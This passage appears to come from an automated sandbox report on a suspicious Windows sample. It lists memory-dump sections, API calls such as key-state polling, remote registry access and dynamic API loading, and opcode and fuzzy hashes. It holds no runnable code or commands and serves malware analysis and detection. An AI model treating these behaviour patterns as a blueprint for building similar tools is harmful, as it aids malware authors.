                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                                  • String ID: %s%d
                                                                                                                  • API String ID: 2645982514-1110647743
                                                                                                                  • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                  • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                                  • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                  • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                  • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                                  • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                  • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3488606520-0
                                                                                                                  • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                  • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                                  • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                  • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 15295421-0
                                                                                                                  • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                  • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                                  • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                  • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                                  APIs
                                                                                                                  • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2449869053-0
                                                                                                                  • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                  • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                                  • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                  • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                                  APIs
                                                                                                                  • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                  • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                  • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3539004672-0
                                                                                                                  • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                  • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                                  • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                  • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                                  APIs
                                                                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 327565842-0
                                                                                                                  • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                  • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                                  • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                  • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                                  APIs
                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfile$SectionWrite$String
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2832842796-0
                                                                                                                  • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                  • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                                  • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                  • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                                  APIs
                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Enum$CloseDeleteOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2095303065-0
                                                                                                                  • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                  • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                                  • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                  • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                                  APIs
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: RectWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 861336768-0
                                                                                                                  • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                  • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                                  • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                  • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32 ref: 00449598
                                                                                                                    • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                  • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                                  • _wcslen.LIBCMT ref: 0044960D
                                                                                                                  • _wcslen.LIBCMT ref: 0044961A
                                                                                                                  • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1856069659-0
                                                                                                                  • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                  • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                                                  • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                  • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                                                  APIs
                                                                                                                  • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                                  • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                                  • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                                  • TrackPopupMenuEx.USER32(02D06420,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CursorMenuPopupTrack$Proc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1300944170-0
                                                                                                                  • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                  • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                                  • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                  • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                                  • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                                  • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                                  • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1822080540-0
                                                                                                                  • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                  • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                                  • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                  • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                                  APIs
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                  • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 659298297-0
                                                                                                                  • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                  • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                                  • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                  • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                                  APIs
                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
